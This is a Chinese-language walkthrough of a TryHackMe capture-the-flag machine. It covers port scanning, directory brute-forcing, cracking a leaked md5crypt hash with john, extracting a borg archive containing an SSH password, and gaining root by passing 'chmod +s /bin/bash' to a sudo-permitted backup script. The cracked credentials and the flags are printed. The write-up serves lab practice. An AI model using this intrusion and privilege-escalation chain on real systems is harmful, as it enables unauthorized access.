服务发现
┌──(rootkali)-[~/tryhackme/Cyborg]└─# nmap -sV -Pn 10.10.56.66Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-09 10:32 EDTNmap scan report for 10.10.56.66Host is up (0.31s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 45.80 seconds爆破目录
┌──(rootkali)-[~/tryhackme/dirsearch]└─# python3 dirsearch.py -u http://10.10.56.66 -e* _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak HTTP method: GET | Threads: 30 | Wordlist size: 15492Output File: /root/tryhackme/dirsearch/reports/10.10.56.66/_21-10-09_10-55-20.txtError Log: /root/tryhackme/dirsearch/logs/errors-21-10-09_10-55-20.logTarget: http://10.10.56.66/[10:55:21] Starting: [10:55:28] 400 - 302B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd [10:55:35] 403 - 275B - /.ht_wsr.txt [10:56:08] 301 - 308B - /admin -> http://10.10.56.66/admin/ [10:56:10] 200 - 6KB - /admin/ [10:56:11] 403 - 275B - /admin/.htaccess [10:56:11] 200 - 6KB - /admin/?/login [10:56:11] 200 - 5KB - /admin/admin.html [10:56:14] 200 - 6KB - /admin/ [10:57:18] 301 - 306B - /etc -> http://10.10.56.66/etc/ [10:57:18] 200 - 925B - /etc/ [10:57:31] 200 - 11KB - /index.html [10:58:14] 403 - 275B - /server-status [10:58:14] 403 - 275B - /server-status/ 在http://10.10.56.66/etc/squid/passwd找到一个登陆凭证
music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
保留到本地,用john破解
┌──(rootkali)-[~/tryhackme/Cyborg]└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt Created directory: /root/.johnWarning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"Use the "--format=md5crypt-long" option to force loading these as that type insteadUsing default input encoding: UTF-8Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])Will run 4 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statussquidward (music_archive)1g 0:00:00:00 DONE (2021-10-09 10:43) 4.761g/s 185600p/s 185600c/s 185600C/s 112806..samantha5Use the "--show" option to display all of the cracked passwords reliablySession completed失去登陆凭证:music_archive:squidward,然而无奈通过ssh登陆
在首页dowmload一个压缩包archiver.tar,解压后失去几个文件
┌──(rootkali)-[~/…/home/field/dev/final_archive]└─# lsconfig data hints.5 index.5 integrity.5 nonce README 查看readme,这个是一个brog仓库
在kali本地装置brog当前,应用下面的明码析出文件一个home文件
┌──(rootkali)-[~/…/Cyborg/home/field/dev]└─# borg extract ./final_archive::music_archiveEnter passphrase for key /root/tryhackme/Cyborg/home/field/dev/final_archive: ┌──(rootkali)-[~/…/Cyborg/home/field/dev]└─# lsfinal_archive home找到alex的登录凭证:
┌──(rootkali)-[~/…/dev/home/alex/Documents]└─# cat note.txt Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!alex:S3cretP@s3登录alex账号,拿到user flag
┌──(rootkali)-[~/tryhackme/Cyborg]└─# ssh alex@10.10.56.66 130 ⨯alex@10.10.56.66's password: Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage27 packages can be updated.0 updates are security updates.The programs included with the Ubuntu system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted byapplicable law.alex@ubuntu:~$ lsDesktop Documents Downloads Music Pictures Public Templates user.txt Videosalex@ubuntu:~$ cat user.txtflag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}查看本账户root权限
alex@ubuntu:~$ sudo -lMatching Defaults entries for alex on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser alex may run the following commands on ubuntu: (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh咱们查看backup.sh的源代码
alex@ubuntu:~$ cat /etc/mp3backups/backup.sh#!/bin/bashsudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txtinput="/etc/mp3backups/backed_up_files.txt"#while IFS= read -r line#do #a="/etc/mp3backups/backed_up_files.txt"# b=$(basename $input) #echo# echo "$line"#done < "$input"while getopts c: flagdo case "${flag}" in c) command=${OPTARG};; esacdonebackup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"# Where to backup to.dest="/etc/mp3backups/"# Create archive filename.hostname=$(hostname -s)archive_file="$hostname-scheduled.tgz"# Print start status message.echo "Backing up $backup_files to $dest/$archive_file"echo# Backup the files using tar.tar czf $dest/$archive_file $backup_files# Print end status message.echoecho "Backup finished"cmd=$($command)echo $cmd看源码是备份所有.mp3文件
我一开始还认为是通过tar命令提权,因为如果一个文件的名字叫xxx.mp3 --checkpoint=1能够被执行的话,那就能够通过tar执行一个shell,然而重复试了屡次还是不行
起初看大佬的writeup,发现重点是在这段代码(我一开始没看明确这段是在表白什么,所以脱漏了这个提权点):
while getopts c: flagdo case "${flag}" in c) command=${OPTARG};; esacdone...cmd=$($command)echo $cmd它实际上相当于接管一个"-c"的命令,而后再执行这个命令,例如
alex@ubuntu:~/Music$ sudo /etc/mp3backups/backup.sh -c whoamiroot加SUID到bash命令,提权到root
sudo /etc/mp3backups/backup.sh -c "chmod +s /bin/bash"alex@ubuntu:~/Music$ bash -pbash-4.3# whoamirootbash-4.3# cat /root/root.txt flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}